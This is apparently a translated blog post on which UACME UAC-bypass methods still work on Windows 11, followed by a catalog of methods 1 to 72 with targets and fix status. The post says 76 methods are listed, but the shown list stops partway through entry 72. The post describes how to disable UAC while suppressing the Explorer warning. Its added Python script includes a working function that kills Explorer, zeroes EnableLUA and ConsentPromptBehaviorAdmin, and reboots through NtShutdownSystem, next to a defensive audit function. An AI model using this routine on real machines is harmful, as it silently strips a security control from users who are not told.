[UACME] Status on Win11
UACME is a tool that collects the publicly known UAC bypass methods; it is open source on GitHub. The author, however, does not seem to have kept the method notes up to date, and the "Fixed in" status in the README lags behind current Windows builds. The 76 bypass methods published so far are listed below:
Notes:
(1) On Win11 22H2 (build 22621.1105, the latest release at the time of writing) several methods have been fixed. The entries that still bypass UAC on a bare machine (no AV) are 33, 41, 43, 53, 59, 61, 62, 70 and 73. On a machine with AV installed, elevation through COM components is blocked by the AV's hooks; the bypass is that calls made from an idle COM component are filtered out on resume, ***. Disabling UAC by registry modification is also caught by AV, and the way past the registry monitoring is ****. (Withheld so it cannot be abused by the ill-intentioned; anyone who needs it for research can find it easily.) Keep in mind that the "Fixed in" fields in the list below are the UACME README's status, not the result of this test: an entry marked unfixed there may still fail on 22621.
(2) Registry. Under
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
when the EnableLUA value changes from 1 to 0, "Security and Maintenance" shows a balloon saying the computer must be restarted to turn off User Account Control. To suppress it, close Explorer before making the change: the message is not raised by Security and Maintenance (the Action Center) but by explorer.exe itself, and an explorer restarted after the change no longer watches whether the value is 1. Then set ConsentPromptBehaviorAdmin to 0 and reboot by calling NtShutdownSystem (or ZwShutdownSystem); UAC is then completely off. Both writes require an already elevated token (the key is writable only from an administrative, high-integrity context) and NtShutdownSystem needs SeShutdownPrivilege enabled in that token, so this is a post-bypass step rather than a bypass on its own.
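The following is an added example, written for this page in Python; it is not code from the page's author or from the UACME project. It does two things: classifies the UAC policy state from the values named above (plus PromptOnSecureDesktop, which I add because it is the other value that weakens UAC without turning it off), and automates the silent-disable sequence just described. My assumptions, not the page's: the value meanings follow Microsoft's documented UAC policy semantics; `taskkill` and relaunching `explorer.exe` stand in for however the author closed and restarted Explorer; the reboot uses `ntdll!RtlAdjustPrivilege` and `ntdll!NtShutdownSystem` through ctypes. The two Windows-only functions need an already elevated token; the classifier is pure and runs anywhere.

```python
"""UAC policy audit plus the silent-disable sequence described above.

Added example, not code from this page or from the UACME project.  Assumed
(not stated on the page): value meanings per Microsoft's UAC policy docs,
taskkill / explorer.exe for the Explorer restart, and ntdll!RtlAdjustPrivilege
+ ntdll!NtShutdownSystem via ctypes for the reboot.
"""
import sys

POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
# What a stock install behaves like when a value name is absent (assumed defaults).
DEFAULTS = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 5, "PromptOnSecureDesktop": 1}


def classify_uac(values):
    """Classify a dict of policy values; returns (state, reasons).

    'disabled'         EnableLUA=0, the end state of the procedure above
    'silent_elevation' ConsentPromptBehaviorAdmin=0, UAC on but never prompts
    'weakened'         PromptOnSecureDesktop=0, prompt drawn on the user desktop
    'default'          ConsentPromptBehaviorAdmin=5 (prompt for non-Windows binaries)
    'custom'           anything else (1-4 are stricter than default)
    """
    v = {**DEFAULTS, **values}
    reasons = []
    if v["EnableLUA"] == 0:
        reasons.append("EnableLUA=0: UAC is off after the next reboot")
        return "disabled", reasons
    if v["ConsentPromptBehaviorAdmin"] == 0:
        reasons.append("ConsentPromptBehaviorAdmin=0: admins elevate without any prompt")
        return "silent_elevation", reasons
    if v["PromptOnSecureDesktop"] == 0:
        reasons.append("PromptOnSecureDesktop=0: prompt on the interactive desktop, spoofable")
        return "weakened", reasons
    return ("default" if v["ConsentPromptBehaviorAdmin"] == 5 else "custom"), reasons


def read_uac_policy():
    """Read the live values (Windows only; reading needs no elevation)."""
    import winreg
    found = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POLICY_KEY) as key:
        for name in DEFAULTS:
            try:
                found[name], _ = winreg.QueryValueEx(key, name)
            except FileNotFoundError:
                pass  # absent value: classify_uac() applies the default
    return found


def disable_uac_silently():
    """The sequence from note (2); requires an already elevated token.

    1. stop explorer so nothing is watching EnableLUA
    2. EnableLUA=0 and ConsentPromptBehaviorAdmin=0
    3. restart explorer (it does not re-check the value)
    4. reboot through NtShutdownSystem(ShutdownReboot)
    """
    import ctypes, subprocess, winreg
    subprocess.run(["taskkill", "/f", "/im", "explorer.exe"], check=False)
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POLICY_KEY, 0,
                        winreg.KEY_SET_VALUE) as key:  # PermissionError if not elevated
        winreg.SetValueEx(key, "EnableLUA", 0, winreg.REG_DWORD, 0)
        winreg.SetValueEx(key, "ConsentPromptBehaviorAdmin", 0, winreg.REG_DWORD, 0)
    subprocess.Popen(["explorer.exe"])
    ntdll = ctypes.windll.ntdll
    SE_SHUTDOWN_PRIVILEGE = 19            # SeShutdownPrivilege LUID
    was_enabled = ctypes.c_ubyte()
    ntdll.RtlAdjustPrivilege(SE_SHUTDOWN_PRIVILEGE, 1, 0, ctypes.byref(was_enabled))
    ntdll.NtShutdownSystem(1)             # SHUTDOWN_ACTION.ShutdownReboot


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("audit and disable need Windows; classify_uac() runs anywhere")
    if "--disable" in sys.argv:
        disable_uac_silently()
    state, why = classify_uac(read_uac_policy())
    print(state, *why, sep="\n  ")
```

Run without arguments to audit a host; a result of `disabled` or `silent_elevation` on a machine nobody administers that way is the registry-side trace of this technique, and is worth alerting on alongside the reboot that follows it.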
1. Author: Leo Davidson
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): cryptbase.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: sysprep.exe hardened LoadFrom manifest elements
* Code status: removed starting from v3.5.0 :tractor:
2. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): ShCore.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 8.1 (9600)
* Fixed in: Windows 10 TP (> 9600)
* How: Side effect of ShCore.dll moving to \KnownDlls
* Code status: removed starting from v3.5.0 :tractor:
3. Author: Leo Davidson derivative by WinNT/Pitou
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\oobe\setupsqm.exe
* Component(s): WdsCore.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH2 (10558)
* How: Side effect of OOBE redesign
* Code status: removed starting from v3.5.0 :tractor:
4. Author: Jon Ericson, WinNT/Gootkit, mzH
* Type: AppCompat
* Method: RedirectEXE Shim
* Target(s): \system32\cliconfg.exe
* Component(s): -
* Implementation: ucmShimRedirectEXE
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TP (> 9600)
* How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions
* Code status: removed starting from v3.5.0 :tractor:
5. Author: WinNT/Simda
* Type: Elevated COM interface
* Method: ISecurityEditor
* Target(s): HKLM registry keys
* Component(s): -
* Implementation: ucmSimdaTurnOffUac
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH1 (10147)
* How: ISecurityEditor interface method changed
* Code status: removed starting from v3.5.0 :tractor:
6. Author: Win32/Carberp
* Type: Dll Hijack
* Method: WUSA
* Target(s): \ehome\mcx2prov.exe, \system32\migwiz\migwiz.exe
* Component(s): WdsCore.dll, CryptBase.dll, CryptSP.dll
* Implementation: ucmWusaMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH1 (10147)
* How: WUSA /extract option removed
* Code status: removed starting from v3.5.0 :tractor:
7. Author: Win32/Carberp derivative
* Type: Dll Hijack
* Method: WUSA
* Target(s): \system32\cliconfg.exe
* Component(s): ntwdblib.dll
* Implementation: ucmWusaMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH1 (10147)
* How: WUSA /extract option removed
* Code status: removed starting from v3.5.0 :tractor:
8. Author: Leo Davidson derivative by Win32/Tilon
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): Actionqueue.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: sysprep.exe hardened LoadFrom manifest
* Code status: removed starting from v3.5.0 :tractor:
9. Author: Leo Davidson, WinNT/Simda, Win32/Carberp derivative
* Type: Dll Hijack
* Method: IFileOperation, ISecurityEditor, WUSA
* Target(s): IFEO registry keys, \system32\cliconfg.exe
* Component(s): Attacker defined Application Verifier Dll
* Implementation: ucmAvrfMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH1 (10147)
* How: WUSA /extract option removed, ISecurityEditor interface method changed
* Code status: removed starting from v3.5.0 :tractor:
10. Author: WinNT/Pitou, Win32/Carberp derivative
* Type: Dll Hijack
* Method: IFileOperation, WUSA
* Target(s): \system32\{New}or{Existing}\{autoelevated}.exe, e.g. winsat.exe
* Component(s): Attacker defined dll, e.g. PowProf.dll, DevObj.dll
* Implementation: ucmWinSATMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH2 (10548)
* How: AppInfo elevated application path control hardening
* Code status: removed starting from v3.5.0 :tractor:
11. Author: Jon Ericson, WinNT/Gootkit, mzH
* Type: AppCompat
* Method: Shim Memory Patch
* Target(s): \system32\iscsicli.exe
* Component(s): Attacker prepared shellcode
* Implementation: ucmShimPatch
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions
* Code status: removed starting from v3.5.0 :tractor:
12. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): dbgcore.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 10 TH1 (10240)
* Fixed in: Windows 10 TH2 (10565)
* How: sysprep.exe manifest updated
* Code status: removed starting from v3.5.0 :tractor:
13. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\mmc.exe EventVwr.msc
* Component(s): elsext.dll
* Implementation: ucmMMCMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14316)
* How: Missing dependency removed
* Code status: removed starting from v3.5.0 :tractor:
14. Author: Leo Davidson, WinNT/Sirefef derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\credwiz.exe, \system32\wbem\oobe.exe
* Component(s): netutils.dll
* Implementation: ucmSirefefMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH2 (10548)
* How: AppInfo elevated application path control hardening
* Code status: removed starting from v3.5.0 :tractor:
15. Author: Leo Davidson, Win32/Addrop, Metasploit derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\cliconfg.exe
* Component(s): ntwdblib.dll
* Implementation: ucmGenericAutoelevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14316)
* How: Cliconfg.exe autoelevation removed
* Code status: removed starting from v3.5.0 :tractor:
16. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\GWX\GWXUXWorker.exe, \system32\inetsrv\inetmgr.exe
* Component(s): SLC.dll
* Implementation: ucmGWX
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14316)
* How: AppInfo elevated application path control and inetmgr executable hardening
* Code status: removed starting from v3.5.0 :tractor:
17. Author: Leo Davidson derivative
* Type: Dll Hijack (Import forwarding)
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): unbcl.dll
* Implementation: ucmStandardAutoElevation2
* Works from: Windows 8.1 (9600)
* Fixed in: Windows 10 RS1 (14371)
* How: sysprep.exe manifest updated
* Code status: removed starting from v3.5.0 :tractor:
18. Author: Leo Davidson derivative
* Type: Dll Hijack (Manifest)
* Method: IFileOperation
* Target(s): \system32\taskhost.exe, \system32\tzsync.exe (any ms exe without manifest)
* Component(s): Attacker defined
* Implementation: ucmAutoElevateManifest
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14371)
* How: Manifest parsing logic reviewed
* Code status: removed starting from v3.5.0 :tractor:
19. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\inetsrv\inetmgr.exe
* Component(s): MsCoree.dll
* Implementation: ucmInetMgrMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14376)
* How: inetmgr.exe executable manifest hardening, MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images
* Code status: removed starting from v3.5.0 :tractor:
20. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\mmc.exe, Rsop.msc
* Component(s): WbemComn.dll
* Implementation: ucmMMCMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS3 (16232)
* How: Target requires wbemcomn.dll to be signed by MS
* Code status: removed starting from v3.5.0 :tractor:
21. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation, SxS DotLocal
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): comctl32.dll
* Implementation: ucmSXSMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS3 (16232)
* How: MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images
* Code status: removed starting from v3.5.0 :tractor:
22. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation, SxS DotLocal
* Target(s): \system32\consent.exe
* Component(s): comctl32.dll
* Implementation: ucmSXSMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.5.0
23. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\pkgmgr.exe
* Component(s): DismCore.dll
* Implementation: ucmDismMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.5.1
24. Author: BreakingMalware
* Type: Shell API
* Method: Environment variables expansion
* Target(s): \system32\CompMgmtLauncher.exe
* Component(s): Attacker defined
* Implementation: ucmCometMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS2 (15031)
* How: CompMgmtLauncher.exe autoelevation removed
* Code status: removed starting from v3.5.0 :tractor:
25. Author: Enigma0x3
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\EventVwr.exe, \system32\CompMgmtLauncher.exe
* Component(s): Attacker defined
* Implementation: ucmHijackShellCommandMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS2 (15031)
* How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removed
* Code status: removed starting from v3.5.0 :tractor:
26. Author: Enigma0x3
* Type: Race Condition
* Method: File overwrite
* Target(s): %temp%\GUID\dismhost.exe
* Component(s): LogProvider.dll
* Implementation: ucmDiskCleanupRaceCondition
* Works from: Windows 10 TH1 (10240)
* AlwaysNotify compatible
* Fixed in: Windows 10 RS2 (15031)
* How: File security permissions altered
* Code status: removed starting from v3.5.0 :tractor:
27. Author: ExpLife
* Type: Elevated COM interface
* Method: IARPUninstallStringLauncher
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmUninstallLauncherMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS3 (16199)
* How: UninstallStringLauncher interface removed from COMAutoApprovalList
* Code status: removed starting from v3.5.0 :tractor:
28. Author: Exploit/Sandworm
* Type: Whitelisted component
* Method: InfDefaultInstall
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmSandwormMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: InfDefaultInstall.exe removed from g_lpAutoApproveEXEList (MS14-060)
* Code status: removed starting from v3.5.0 :tractor:
29. Author: Enigma0x3
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\sdclt.exe
* Component(s): Attacker defined
* Implementation: ucmAppPathMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: Windows 10 RS3 (16215)
* How: Shell API update
* Code status: removed starting from v3.5.0 :tractor:
30. Author: Leo Davidson derivative, lhc645
* Type: Dll Hijack
* Method: WOW64 logger
* Target(s): \syswow64\{any elevated exe, e.g. wusa.exe}
* Component(s): wow64log.dll
* Implementation: ucmWow64LoggerMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.0
31. Author: Enigma0x3
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\sdclt.exe
* Component(s): Attacker defined
* Implementation: ucmSdcltIsolatedCommandMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: Windows 10 RS4 (17025)
* How: Shell API / Windows components update
* Code status: removed starting from v3.5.0 :tractor:
32. Author: xi-tauw
* Type: Dll Hijack
* Method: UIPI bypass with uiAccess application
* Target(s): \Program Files\Windows Media Player\osk.exe, \system32\EventVwr.exe, \system32\mmc.exe
* Component(s): duser.dll, osksupport.dll
* Implementation: ucmUiAccessMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.1
33. Author: winscripting.blog
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\fodhelper.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.2
34. Author: James Forshaw
* Type: Shell API
* Method: Environment variables expansion
* Target(s): \system32\svchost.exe via \system32\schtasks.exe
* Component(s): Attacker defined
* Implementation: ucmDiskCleanupEnvironmentVariable
* Works from: Windows 8.1 (9600)
* AlwaysNotify compatible
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.2
35. Author: CIA & James Forshaw
* Type: Impersonation
* Method: Token Manipulations
* Target(s): Autoelevated applications
* Component(s): Attacker defined
* Implementation: ucmTokenModification
* Works from: Windows 7 (7600)
* AlwaysNotify compatible, see note
* Fixed in: Windows 10 RS5 (17686)
* How: ntoskrnl.exe->SeTokenCanImpersonate additional access token check added
* Code status: removed starting from v3.5.0 :tractor:
36. Author: Thomas Vanhoutte aka SandboxEscaper
* Type: Race condition
* Method: NTFS reparse point & Dll Hijack
* Target(s): wusa.exe, pkgmgr.exe
* Component(s): Attacker defined
* Implementation: ucmJunctionMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.4
37. Author: Ernesto Fernandez, Thomas Vanhoutte
* Type: Dll Hijack
* Method: SxS DotLocal, NTFS reparse point
* Target(s): \system32\dccw.exe
* Component(s): GdiPlus.dll
* Implementation: ucmSXSDccwMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.5
38. Author: Clement Rouault
* Type: Whitelisted component
* Method: APPINFO command line spoofing
* Target(s): \system32\mmc.exe
* Component(s): Attacker defined
* Implementation: ucmHakrilMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.6
39. Author: Stefan Kanthak
* Type: Dll Hijack
* Method: .NET Code Profiler
* Target(s): \system32\mmc.exe
* Component(s): Attacker defined
* Implementation: ucmCorProfilerMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.7
40. Author: Ruben Boonen
* Type: COM Handler Hijack
* Method: Registry key manipulation
* Target(s): \system32\mmc.exe, \system32\recdisc.exe
* Component(s): Attacker defined
* Implementation: ucmCOMHandlersMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 19H1 (18362)
* How: Side effect of Windows changes
* Code status: removed starting from v3.5.0 :tractor:
41. Author: Oddvar Moe
* Type: Elevated COM interface
* Method: ICMLuaUtil
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmCMLuaUtilShellExecMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.9
42. Author: BreakingMalware and Enigma0x3
* Type: Elevated COM interface
* Method: IFwCplLua
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmFwCplLuaMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS4 (17134)
* How: Shell API update
* Code status: removed starting from v3.5.0 :tractor:
43. Author: Oddvar Moe derivative
* Type: Elevated COM interface
* Method: IColorDataProxy, ICMLuaUtil
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmDccwCOMMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.8.3
44. Author: bytecode77
* Type: Shell API
* Method: Environment variables expansion
* Target(s): Multiple auto-elevated processes
* Component(s): Various per target
* Implementation: ucmVolatileEnvMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS3 (16299)
* How: Current user system directory variables ignored during process creation
* Code status: removed starting from v3.5.0 :tractor:
45. Author: bytecode77
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\slui.exe
* Component(s): Attacker defined
* Implementation: ucmSluiHijackMethod
* Works from: Windows 8.1 (9600)
* Fixed in: Windows 10 20H1 (19041)
* How: Side effect of Windows changes
* Code status: removed starting from v3.5.0 :tractor:
46. Author: Anonymous
* Type: Race Condition
* Method: Registry key manipulation
* Target(s): \system32\BitlockerWizardElev.exe
* Component(s): Attacker defined
* Implementation: ucmBitlockerRCMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS4 (>16299)
* How: Shell API update
* Code status: removed starting from v3.5.0 :tractor:
47. Author: clavoillotte & 3gstudent
* Type: COM Handler Hijack
* Method: Registry key manipulation
* Target(s): \system32\mmc.exe
* Component(s): Attacker defined
* Implementation: ucmCOMHandlersMethod2
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 19H1 (18362)
* How: Side effect of Windows changes
* Code status: removed starting from v3.5.0 :tractor:
48. Author: deroko
* Type: Elevated COM interface
* Method: ISPPLUAObject
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmSPPLUAObjectMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS5 (17763)
* How: ISPPLUAObject interface method changed
* Code status: removed starting from v3.5.0 :tractor:
49. Author: RinN
* Type: Elevated COM interface
* Method: ICreateNewLink
* Target(s): \system32\TpmInit.exe
* Component(s): WbemComn.dll
* Implementation: ucmCreateNewLinkMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14393)
* How: Side effect of consent.exe COMAutoApprovalList introduction
* Code status: removed starting from v3.5.0 :tractor:
50. Author: Anonymous
* Type: Elevated COM interface
* Method: IDateTimeStateWrite, ISPPLUAObject
* Target(s): w32time service
* Component(s): w32time.dll
* Implementation: ucmDateTimeStateWriterMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS5 (17763)
* How: Side effect of ISPPLUAObject interface change
* Code status: removed starting from v3.5.0 :tractor:
51. Author: bytecode77 derivative
* Type: Elevated COM interface
* Method: IAccessibilityCplAdmin
* Target(s): \system32\rstrui.exe
* Component(s): Attacker defined
* Implementation: ucmAcCplAdminMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS4 (17134)
* How: Shell API update
* Code status: removed starting from v3.5.0 :tractor:
52. Author: David Wells
* Type: Whitelisted component
* Method: AipNormalizePath parsing abuse
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmDirectoryMockMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.0.4
53. Author: Emeric Nasi
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\sdclt.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod
* Works from: Windows 10 (14393)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.1.3
54. Author: egre55
* Type: Dll Hijack
* Method: Dll path search abuse
* Target(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exe
* Component(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dll
* Implementation: ucmEgre55Method
* Works from: Windows 10 (14393)
* Fixed in: Windows 10 19H1 (18362)
* How: SysDm.cpl!_CreateSystemRestorePage has been updated for secured load library call
* Code status: removed starting from v3.5.0 :tractor:
55. Author: James Forshaw
* Type: GUI Hack
* Method: UIPI bypass with token modification
* Target(s): \system32\osk.exe, \system32\msconfig.exe
* Component(s): Attacker defined
* Implementation: ucmTokenModUIAccessMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.1.5
56. Author: Hashim Jawad
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\WSReset.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod2
* Works from: Windows 10 (17134)
* Fixed in: Windows 11 (22000)
* How: Windows components redesign
* Code status: removed starting from v3.5.7 :tractor:
57. Author: Leo Davidson derivative by Win32/Gapz
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): unattend.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: sysprep.exe hardened LoadFrom manifest elements
* Code status: removed starting from v3.5.0 :tractor:
58. Author: RinN
* Type: Elevated COM interface
* Method: IEditionUpgradeManager
* Target(s): \system32\clipup.exe
* Component(s): Attacker defined
* Implementation: ucmEditionUpgradeManagerMethod
* Works from: Windows 10 (14393)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.0
59. Author: James Forshaw
* Type: AppInfo ALPC
* Method: RAiLaunchAdminProcess and DebugObject
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmDebugObjectMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.3
60. Author: Enigma0x3 derivative by WinNT/Glupteba
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\CompMgmtLauncher.exe
* Component(s): Attacker defined
* Implementation: ucmGluptebaMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS2 (15063)
* How: CompMgmtLauncher.exe autoelevation removed
* Code status: removed starting from v3.5.0 :tractor:
61. Author: Enigma0x3/bytecode77 derivative by Nassim Asrir
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\slui.exe, \system32\changepk.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod
* Works from: Windows 10 (14393)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.5
62. Author: winscripting.blog
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\computerdefaults.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod
* Works from: Windows 10 RS4 (17134)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.6
63. Author: Arush Agarampur
* Type: Dll Hijack
* Method: ISecurityEditor
* Target(s): Native Image Cache elements
* Component(s): Attacker defined
* Implementation: ucmNICPoisonMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.7
64. Author: Arush Agarampur
* Type: Elevated COM interface
* Method: IIEAxiAdminInstaller, IIEAxiInstaller2, IFileOperation
* Target(s): IE add-on install cache
* Component(s): Attacker defined
* Implementation: ucmIeAddOnInstallMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.1
65. Author: Arush Agarampur
* Type: Elevated COM interface
* Method: IWscAdmin
* Target(s): Shell Protocol Hijack
* Component(s): Attacker defined
* Implementation: ucmWscActionProtocolMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.2
66. Author: Arush Agarampur
* Type: Elevated COM interface
* Method: IFwCplLua, Shell Protocol Hijack
* Target(s): Shell protocol registry entry and environment variables
* Component(s): Attacker defined
* Implementation: ucmFwCplLuaMethod2
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.3
67. Author: Arush Agarampur
* Type: Shell API
* Method: Shell Protocol Hijack
* Target(s): \system32\fodhelper.exe
* Component(s): Attacker defined
* Implementation: ucmMsSettingsProtocolMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.4
68. Author: Arush Agarampur
* Type: Shell API
* Method: Shell Protocol Hijack
* Target(s): \system32\wsreset.exe
* Component(s): Attacker defined
* Implementation: ucmMsStoreProtocolMethod
* Works from: Windows 10 RS5 (17763)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.5
69. Author: Arush Agarampur
* Type: Shell API
* Method: Environment variables expansion, Dll Hijack
* Target(s): \system32\taskhostw.exe
* Component(s): pcadm.dll
* Implementation: ucmPcaMethod
* Works from: Windows 7 (7600)
* AlwaysNotify compatible
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.6
70. Author: V3ded
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\fodhelper.exe, \system32\computerdefaults.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod3
* Works from: Windows 10 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.7
71. Author: Arush Agarampur
* Type: Dll Hijack
* Method: ISecurityEditor
* Target(s): Native Image Cache elements
* Component(s): Attacker defined
* Implementation: ucmNICPoisonMethod2
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.8
72. Author: Emeric Nasi
* Type: Dll Hijack
* Method: Dll path search abuse
* Target(s): \syswow64\msdt.exe, \system32\sdiagnhost.exe
* Component(s): BluetoothDiagnosticUtil.dll
* Implementation: ucmMsdtMethod
* Works from: Windows 10 (10240)
